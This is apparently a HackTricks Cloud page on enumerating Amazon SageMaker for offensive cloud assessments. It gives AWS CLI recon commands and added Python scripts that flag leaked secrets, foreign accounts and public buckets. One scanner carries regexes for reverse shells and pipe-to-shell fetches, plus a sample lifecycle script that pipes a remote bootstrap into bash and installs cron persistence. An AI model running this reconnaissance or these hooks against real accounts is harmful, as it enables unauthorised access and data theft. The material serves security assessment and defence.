AWS - SageMaker Enum
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Service Overview
Amazon SageMaker is AWS's managed machine-learning platform. It bundles notebooks, training infrastructure, orchestration, registries and managed inference endpoints. Compromising SageMaker resources typically yields:
- Long-lived IAM execution roles with broad access to S3, ECR, Secrets Manager or KMS.
- Access to sensitive datasets stored in S3, EFS or inside feature stores.
- Network footholds inside VPCs (Studio apps, training jobs, endpoints).
- High-privilege presigned URLs that bypass console authentication.
Understanding how SageMaker is put together matters before you pivot, persist or exfiltrate data.
Core Components
- Studio Domains & Spaces: web IDEs (JupyterLab, Code Editor, RStudio). Each domain has a shared EFS file system and a default execution role.
- Notebook Instances: managed EC2 instances for standalone notebooks; each uses its own execution role.
- Training / Processing / Transform Jobs: ephemeral containers that pull code from ECR and data from S3.
- Pipelines & Experiments: orchestrated workflows that describe every step, input and output.
- Models & Endpoints: packaged artefacts deployed for inference behind HTTPS endpoints.
- Feature Store & Data Wrangler: managed services for data preparation and feature management.
- Autopilot & JumpStart: automated ML and a catalogue of curated models.
- MLflow Tracking Servers: managed MLflow UI/API reached through presigned URLs.
Every resource references an execution role, S3 locations, container images and optional VPC/KMS settings; capture all of them during enumeration.
Account & Global Metadata
REGION=us-east-1
# Portfolio status, used when provisioning Studio resources
aws sagemaker get-sagemaker-servicecatalog-portfolio-status --region $REGION
# List execution roles used by models. ListModels only returns names/ARNs, so
# describe each model to read ExecutionRoleArn (extend to other resources as needed)
for m in $(aws sagemaker list-models --region $REGION --query 'Models[].ModelName' --output text); do
  aws sagemaker describe-model --model-name "$m" --region $REGION --query 'ExecutionRoleArn' --output text
done | sort -u
# Generic tag sweep across any SageMaker ARN you know
aws sagemaker list-tags --resource-arn <sagemaker-arn> --region $REGION
Identify any cross-account trust (execution roles or S3 buckets whose policies name external principals) and any guardrails in place, such as service control policies (SCPs).
Studio Domains, Apps and Shared Spaces
aws sagemaker list-domains --region $REGION
aws sagemaker describe-domain --domain-id <domain-id> --region $REGION
aws sagemaker list-user-profiles --domain-id-equals <domain-id> --region $REGION
aws sagemaker describe-user-profile --domain-id <domain-id> --user-profile-name <profile> --region $REGION
# Enumerate apps (JupyterServer, KernelGateway, RStudioServerPro, CodeEditor, Canvas, etc.)
aws sagemaker list-apps --domain-id-equals <domain-id> --region $REGION
aws sagemaker describe-app --domain-id <domain-id> --user-profile-name <profile> --app-type JupyterServer --app-name default --region $REGION
# Shared collaborative spaces
aws sagemaker list-spaces --domain-id-equals <domain-id> --region $REGION
aws sagemaker describe-space --domain-id <domain-id> --space-name <space> --region $REGION
# Studio lifecycle configurations (shell scripts at start/stop)
aws sagemaker list-studio-lifecycle-configs --region $REGION
aws sagemaker describe-studio-lifecycle-config --studio-lifecycle-config-name <name> --region $REGION
What to record:
- DomainArn, SubnetIds, AppSecurityGroupManagement, DefaultUserSettings.SecurityGroups and DefaultUserSettings.ExecutionRole.
- The attached EFS (HomeEfsFileSystemId) and any S3 paths in the user settings (e.g. SharingSettings.S3OutputPath).
- Lifecycle scripts (they often carry bootstrap credentials or push/pull extra code).
tip
Presigned URLs are a console-authentication bypass: whoever holds a URL minted by CreatePresignedDomainUrl (Studio) or CreatePresignedNotebookInstanceUrl opens that user's session without AWS credentials, and everything run inside it uses the profile's execution role. Treat sagemaker:CreatePresignedDomainUrl / sagemaker:CreatePresignedNotebookInstanceUrl as equivalent to assuming those execution roles, and check who can call them and whether such URLs were handed out broadly.
Notebook Instances and Lifecycle Configurations
aws sagemaker list-notebook-instances --region $REGION
aws sagemaker describe-notebook-instance --notebook-instance-name <name> --region $REGION
aws sagemaker list-notebook-instance-lifecycle-configs --region $REGION
aws sagemaker describe-notebook-instance-lifecycle-config --notebook-instance-lifecycle-config-name <cfg> --region $REGION
Notebook metadata reveals:
- The execution role (RoleArn) and whether the instance has direct internet access or is VPC-only (DirectInternetAccess, SubnetId, SecurityGroups).
- Where code comes from and how hardened the box is: DefaultCodeRepository, AdditionalCodeRepositories, RootAccess.
- Lifecycle scripts for credentials or persistence hooks.
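Both Studio and notebook-instance lifecycle configs come back from the describe-* calls above as base64-encoded shell scripts (StudioLifecycleConfigContent for Studio; OnCreate[].Content and OnStart[].Content for notebook instances), so reading them means decoding first and then looking for the credentials and persistence hooks mentioned in both sections. The script below is an added example, not HackTricks or AWS code: it accepts either describe-* shape, decodes every script and reports indicator matches with line numbers. The sample describe output and the script inside it are constructed; AKIAIOSFODNN7EXAMPLE is AWS's documentation placeholder key, and the indicator regexes are a starting set to extend, not an exhaustive list.

```python
"""Decode SageMaker lifecycle-config scripts and flag credential/persistence indicators.

Added example (not HackTricks code). Input is the JSON printed by
`aws sagemaker describe-studio-lifecycle-config` or
`aws sagemaker describe-notebook-instance-lifecycle-config`.
Usage: aws sagemaker describe-notebook-instance-lifecycle-config ... | python lcc_scan.py
"""
import base64
import json
import re
import sys

# (label, regex) pairs tuned for bash lifecycle scripts. Extend as needed.
INDICATORS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("aws_secret_key_assignment", re.compile(r"AWS_SECRET_ACCESS_KEY\s*=\s*\S+")),
    ("hardcoded_password", re.compile(r"(?i)(password|passwd|token|api[_-]?key)\s*=\s*['\"]?[^\s'\"]{6,}")),
    ("remote_fetch", re.compile(r"\b(curl|wget)\b[^\n|]*https?://")),
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(sudo\s+)?(ba)?sh\b")),
    ("cron_or_nohup", re.compile(r"\b(crontab|nohup|systemctl\s+enable)\b")),
    ("reverse_shell", re.compile(r"/dev/tcp/|\bnc\b[^\n]*-e\b|\bsocat\b")),
]


def extract_scripts(describe_output):
    """Return (hook_name, script_text) pairs from either describe-* output shape."""
    scripts = []
    # Studio lifecycle configs: a single base64 field plus the app type it runs in.
    if "StudioLifecycleConfigContent" in describe_output:
        hook = describe_output.get("StudioLifecycleConfigAppType", "Studio")
        raw = base64.b64decode(describe_output["StudioLifecycleConfigContent"])
        scripts.append((hook, raw.decode("utf-8", errors="replace")))
    # Notebook-instance lifecycle configs: OnCreate / OnStart lists of {"Content": base64}.
    for hook in ("OnCreate", "OnStart"):
        for entry in describe_output.get(hook, []):
            raw = base64.b64decode(entry["Content"])
            scripts.append((hook, raw.decode("utf-8", errors="replace")))
    return scripts


def scan_script(text):
    """Return findings with line numbers so an analyst can jump straight to them."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                findings.append({"indicator": label, "line": lineno, "text": line.strip()})
    return findings


def triage_lifecycle_config(describe_output):
    """Map hook name -> findings for one lifecycle config."""
    return {hook: scan_script(text) for hook, text in extract_scripts(describe_output)}


# Constructed sample: a notebook lifecycle config whose OnStart script exports
# static keys, pipes a remote bootstrap into bash and installs a cron job.
_SAMPLE_SCRIPT = """#!/bin/bash
set -e
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFE/K7MDENG/bPxRfiCYEXAMPLEKEY
curl -s https://bootstrap.example.internal/init.sh | bash
echo "*/5 * * * * /home/ec2-user/.sync.sh" | crontab -
"""
SAMPLE_DESCRIBE_OUTPUT = {
    "NotebookInstanceLifecycleConfigName": "example-lcc",
    "OnCreate": [],
    "OnStart": [{"Content": base64.b64encode(_SAMPLE_SCRIPT.encode()).decode()}],
}

if __name__ == "__main__":
    data = SAMPLE_DESCRIBE_OUTPUT if sys.stdin.isatty() else json.load(sys.stdin)
    print(json.dumps(triage_lifecycle_config(data), indent=2))
```

Run it against every config returned by list-studio-lifecycle-configs and list-notebook-instance-lifecycle-configs; an OnStart hook is the more interesting of the two because it re-executes on every instance start, which is exactly where an attacker would hide a persistence hook.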
Training, Processing, Transform and Batch Jobs
aws sagemaker list-training-jobs --region $REGION
aws sagemaker describe-training-job --training-job-name <job> --region $REGION
aws sagemaker list-processing-jobs --region $REGION
aws sagemaker describe-processing-job --processing-job-name <job> --region $REGION
aws sagemaker list-transform-jobs --region $REGION
aws sagemaker describe-transform-job --transform-job-name <job> --region $REGION
- AlgorithmSpecification.TrainingImage / AppSpecification.ImageUri: which ECR images are pulled (and from which account).
- InputDataConfig & OutputDataConfig: S3 buckets, prefixes and KMS keys.
- ResourceConfig.VolumeKmsKeyId, VpcConfig, EnableNetworkIsolation: determine the network and encryption posture.
- HyperParameters (and Environment) can leak secrets or connection strings.
Pipelines, Experiments & Trials
aws sagemaker list-pipelines --region $REGION
aws sagemaker list-pipeline-executions --pipeline-name <pipeline> --region $REGION
aws sagemaker describe-pipeline --pipeline-name <pipeline> --region $REGION
aws sagemaker list-experiments --region $REGION
aws sagemaker list-trials --experiment-name <experiment> --region $REGION
aws sagemaker list-trial-components --trial-name <trial> --region $REGION
A pipeline description spells out every step, the roles involved, container images and environment variables. Trial components usually include training artefact URIs, S3 logs and metrics that reveal where sensitive data flows.
Models, Endpoint Configs & Deployed Endpoints
aws sagemaker list-models --region $REGION
aws sagemaker describe-model --model-name <name> --region $REGION
aws sagemaker list-endpoint-configs --region $REGION
aws sagemaker describe-endpoint-config --endpoint-config-name <cfg> --region $REGION
aws sagemaker list-endpoints --region $REGION
aws sagemaker describe-endpoint --endpoint-name <endpoint> --region $REGION
Focus areas:
- S3 URIs of model artefacts (PrimaryContainer.ModelDataUrl) and the inference container images.
- Endpoint data-capture settings (S3 bucket, KMS) as a potential log-exfiltration channel.
- Multi-model endpoints using S3DataSource or ModelPackage (check for cross-account packaging).
- Network settings and security groups attached to the endpoints.
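The fields called out for notebook instances, jobs, pipeline definitions and models above are all nested keys in the JSON the describe-* calls print, so one walker can extract them from any of those documents rather than hand-reading each one. The following is an added example, not HackTricks or AWS code: it walks a describe-* document (or the PipelineDefinition string that describe-pipeline returns) and reports roles, ECR images and their owning accounts, s3:// URIs, KMS keys, network posture and secret-looking HyperParameters/Environment entries. The sample training job and pipeline definition are constructed, and the account IDs 111111111111 and 222222222222 are placeholders; the key names it looks for are the real API field names.

```python
"""Triage SageMaker describe-* output or a pipeline definition for roles,
images, S3 URIs, KMS usage, network posture and leaked secrets.

Added example, not HackTricks code. Sample documents are constructed.
Usage: aws sagemaker describe-training-job --training-job-name X | python triage.py 111111111111
"""
import json
import re
import sys

ECR_IMAGE = re.compile(r"^(\d{12})\.dkr\.ecr\.[a-z0-9-]+\.amazonaws\.com/")
ARN_ACCOUNT = re.compile(r"^arn:aws[a-z-]*:[a-z0-9-]+:[a-z0-9-]*:(\d{12}):")
SECRET_NAME = re.compile(r"(?i)secret|password|passwd|token|api[_-]?key|connection|conn_str")

IMAGE_KEYS = {"TrainingImage", "ImageUri", "Image"}          # ECR image references
KMS_KEYS = {"KmsKeyId", "VolumeKmsKeyId", "OutputKmsKeyId"}  # empty value => no CMK
POSTURE_KEYS = {"EnableNetworkIsolation", "DirectInternetAccess", "RootAccess",
                "EnableInterContainerTrafficEncryption"}
SECRET_CONTAINERS = {"HyperParameters", "Environment"}      # where secrets usually leak


def walk(node, path=""):
    """Yield (json_path, leaf_value) for every scalar in a nested dict/list."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from walk(v, f"{path}.{k}" if path else k)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from walk(v, f"{path}[{i}]")
    else:
        yield path, node


def leaf_key(path):
    """'Steps[0].Arguments.VpcConfig.Subnets[1]' -> 'Subnets'"""
    return path.rsplit(".", 1)[-1].split("[")[0]


def parent_key(path):
    """'Steps[0].Arguments.Environment.API_TOKEN' -> 'Environment'"""
    parts = path.rsplit(".", 2)
    return parts[-2].split("[")[0] if len(parts) >= 2 else ""


def triage_describe_output(doc, own_account):
    roles, s3, kms = set(), set(), set()
    images, secrets, posture = [], [], {}
    vpc = {"Subnets": [], "SecurityGroupIds": []}
    for path, value in walk(doc):
        key = leaf_key(path)
        if isinstance(value, str) and key.endswith("RoleArn"):
            roles.add(value)
        if key in IMAGE_KEYS and isinstance(value, str):
            m = ECR_IMAGE.match(value)
            images.append({"path": path, "image": value, "account": m.group(1) if m else None})
        if isinstance(value, str) and value.startswith("s3://"):
            s3.add(value)
        if key in KMS_KEYS and value:
            kms.add(value)
        if key in POSTURE_KEYS:
            posture[key] = value
        if key in vpc and isinstance(value, str):
            vpc[key].append(value)
        if parent_key(path) in SECRET_CONTAINERS and SECRET_NAME.search(key):
            secrets.append({"path": path, "value": value})
    # Accounts other than ours that own a role or image: a real cross-account
    # dependency, or an AWS-owned account serving a first-party image (verify which).
    accounts = {m.group(1) for m in map(ARN_ACCOUNT.match, roles) if m}
    accounts |= {i["account"] for i in images if i["account"]}
    return {"roles": sorted(roles), "images": images, "s3_uris": sorted(s3),
            "kms_keys": sorted(kms), "posture": posture, "vpc": vpc,
            "has_vpc_config": bool(vpc["Subnets"]), "secrets": secrets,
            "foreign_accounts": sorted(a for a in accounts if a != own_account)}


def triage_pipeline_definition(definition_json, own_account):
    """describe-pipeline returns PipelineDefinition as a JSON string."""
    return triage_describe_output(json.loads(definition_json), own_account)


SAMPLE_TRAINING_JOB = {  # constructed, shaped like describe-training-job output
    "TrainingJobName": "fraud-model-2024-05",
    "RoleArn": "arn:aws:iam::111111111111:role/SageMakerExecutionRole",
    "AlgorithmSpecification": {"TrainingImage": "111111111111.dkr.ecr.us-east-1.amazonaws.com/fraud-train:latest",
                               "TrainingInputMode": "File"},
    "HyperParameters": {"epochs": "10", "db_password": "Sup3rS3cret!",
                        "feature_db_connection_string": "postgres://ml:pw@10.0.3.5/features"},
    "InputDataConfig": [{"ChannelName": "train",
                         "DataSource": {"S3DataSource": {"S3Uri": "s3://corp-ml-raw/fraud/train/"}}}],
    "OutputDataConfig": {"S3OutputPath": "s3://corp-ml-artifacts/fraud/", "KmsKeyId": ""},
    "ResourceConfig": {"InstanceType": "ml.m5.xlarge", "InstanceCount": 1, "VolumeSizeInGB": 30},
    "EnableNetworkIsolation": False, "EnableInterContainerTrafficEncryption": False,
}
SAMPLE_PIPELINE_DEFINITION = json.dumps({  # constructed PipelineDefinition string
    "Version": "2020-12-01",
    "Steps": [{"Name": "Preprocess", "Type": "Processing", "Arguments": {
        "RoleArn": "arn:aws:iam::222222222222:role/VendorProcessingRole",
        "AppSpecification": {"ImageUri": "222222222222.dkr.ecr.us-east-1.amazonaws.com/vendor-prep:1.0"},
        "Environment": {"API_TOKEN": "tok_live_example"},
        "NetworkConfig": {"VpcConfig": {"Subnets": ["subnet-0a1b2c3d"], "SecurityGroupIds": ["sg-0f9e8d7c"]}}}}],
})

if __name__ == "__main__":
    own = sys.argv[1] if len(sys.argv) > 1 else "111111111111"
    doc = SAMPLE_TRAINING_JOB if sys.stdin.isatty() else json.load(sys.stdin)
    print(json.dumps(triage_describe_output(doc, own), indent=2))
```

Two caveats when reading the output: an empty kms_keys list with has_vpc_config false and EnableNetworkIsolation false is the weakest posture (unencrypted volumes, egress allowed), and foreign_accounts will include AWS-owned accounts that host SageMaker's first-party algorithm images, so confirm the owner of each image account before treating it as a third-party dependency.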
Feature Store, Data Wrangler & Clarify
aws sagemaker list-feature-groups --region $REGION
aws sagemaker describe-feature-group --feature-group-name <feature-group> --region $REGION
# Data Wrangler flows have no List API: they are *.flow files in the Studio user's EFS home directory (plus any S3 export paths referenced inside them)
aws sagemaker list-model-quality-job-definitions --region $REGION
aws sagemaker list-data-quality-job-definitions --region $REGION
aws sagemaker list-monitoring-schedules --region $REGION
Security notes:
- Online feature stores replicate data through Kinesis; check OnlineStoreConfig.SecurityConfig.KmsKeyId and the offline store bucket in OfflineStoreConfig.S3StorageConfig.
- Data Wrangler flows often embed JDBC/Redshift credentials or private endpoints.
- Clarify/Model Monitor jobs write their output to S3, where it may be world-readable or accessible cross-account.
MLflow Tracking Servers, Autopilot & JumpStart
aws sagemaker list-mlflow-tracking-servers --region $REGION
aws sagemaker describe-mlflow-tracking-server --tracking-server-name <name> --region $REGION
aws sagemaker list-auto-ml-jobs --region $REGION
aws sagemaker describe-auto-ml-job --auto-ml-job-name <name> --region $REGION
# JumpStart content is exposed through hubs (the public catalogue plus any private curated hubs)
aws sagemaker list-hubs --region $REGION
aws sagemaker list-hub-contents --hub-name <hub-name> --hub-content-type Model --region $REGION
- MLflow tracking servers store experiments and artefacts; a presigned URL (create-presigned-mlflow-tracking-server-url) exposes all of it to whoever holds it.
- Autopilot jobs spawn many training jobs; enumerate their outputs to find data that is otherwise hidden.
- JumpStart reference architectures can deploy privileged roles into the account.
IAM & Network Considerations
- Enumerate the IAM policies attached to every execution role (Studio, notebooks, training jobs, pipelines, endpoints).
- Check the network context: subnets, security groups, VPC endpoints. Many organisations isolate training jobs but forget to restrict egress traffic.
- Review the S3 bucket policies referenced in ModelDataUrl, DataCaptureConfig and InputDataConfig for external access.
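The cross-account trust check from the account-metadata section and the bucket-policy review here are the same question asked of two documents: which Allow statements name a principal outside your account? The script below is an added example, not HackTricks or AWS code. It takes a role's AssumeRolePolicyDocument (from aws iam get-role) or a bucket policy string (from aws s3api get-bucket-policy), normalises the Principal element and reports every external or anonymous AWS principal together with whether the statement carries a Condition. Both sample policies are constructed and the account IDs are placeholders; NotPrincipal and non-AWS principal types (Service, Federated, CanonicalUser) are deliberately out of scope.

```python
"""Flag principals outside your own account in IAM trust policies and S3
bucket policies. Added example (not HackTricks code); sample policies are
constructed and account IDs are placeholders.
"""
import json
import re

ACCOUNT_IN_ARN = re.compile(r"^arn:aws[a-z-]*:[a-z0-9-]*:[a-z0-9-]*:(\d{12}):")
BARE_ACCOUNT = re.compile(r"^\d{12}$")


def _principal_entries(principal):
    """Normalise the Principal element into (type, value) pairs."""
    if principal == "*":                       # "Principal": "*" means anonymous
        return [("AWS", "*")]
    entries = []
    for ptype, vals in principal.items():
        for v in (vals if isinstance(vals, list) else [vals]):
            entries.append((ptype, v))
    return entries


def principal_account(value):
    """Account ID behind an AWS principal, '*' for anonymous, None if unparseable."""
    if value == "*":
        return "*"
    if BARE_ACCOUNT.match(value):              # "AWS": "123456789012" (account root)
        return value
    m = ACCOUNT_IN_ARN.match(value)
    return m.group(1) if m else None


def external_principals(policy, own_account):
    """Allow statements whose AWS principals fall outside own_account.

    A Condition (aws:PrincipalOrgID, sts:ExternalId, ...) narrows the trust
    but does not remove it, so it is reported rather than used to filter.
    """
    findings = []
    statements = policy.get("Statement", [])
    for stmt in (statements if isinstance(statements, list) else [statements]):
        if stmt.get("Effect") != "Allow" or "Principal" not in stmt:
            continue
        for ptype, value in _principal_entries(stmt["Principal"]):
            if ptype != "AWS":                 # Service/Federated/CanonicalUser skipped here
                continue
            acct = principal_account(value)
            if acct is None or acct == own_account:
                continue
            findings.append({"sid": stmt.get("Sid"), "principal": value, "account": acct,
                             "anonymous": acct == "*", "actions": stmt.get("Action"),
                             "conditioned": "Condition" in stmt})
    return findings


def external_principals_from_bucket_policy(policy_json, own_account):
    """get-bucket-policy returns the policy as a JSON string."""
    return external_principals(json.loads(policy_json), own_account)


# Constructed trust policy: trusts the SageMaker service (expected) and a
# role in a second account (cross-account trust that needs justification).
SAMPLE_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": {"Service": "sagemaker.amazonaws.com"},
         "Action": "sts:AssumeRole"},
        {"Sid": "VendorAccess", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::222222222222:role/VendorMLOps"},
         "Action": "sts:AssumeRole",
         "Condition": {"StringEquals": {"sts:ExternalId": "example-id"}}},
    ],
}

# Constructed bucket policy for a model-artifact bucket: a partner account can
# read, the second statement makes objects world-readable, the third is internal.
SAMPLE_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PartnerRead", "Effect": "Allow", "Principal": {"AWS": ["333333333333"]},
         "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::corp-ml-artifacts/*"},
        {"Sid": "Public", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::corp-ml-artifacts/*"},
        {"Sid": "Internal", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111111111111:role/SageMakerExecutionRole"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::corp-ml-artifacts/*"},
    ],
})

if __name__ == "__main__":
    print(json.dumps(external_principals(SAMPLE_TRUST_POLICY, "111111111111"), indent=2))
    print(json.dumps(external_principals_from_bucket_policy(SAMPLE_BUCKET_POLICY, "111111111111"), indent=2))
```

Feed it the trust policy of every execution role collected earlier and the policy of every bucket that appears in ModelDataUrl, DataCaptureConfig or InputDataConfig. A hit with anonymous set is a public bucket; a hit with conditioned false is an unrestricted cross-account grant.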
Privilege Escalation
Persistence
Post-Exploitation
AWS - SageMaker Post-Exploitation
Unauthorized Access
AWS - SageMaker Unauthenticated Enum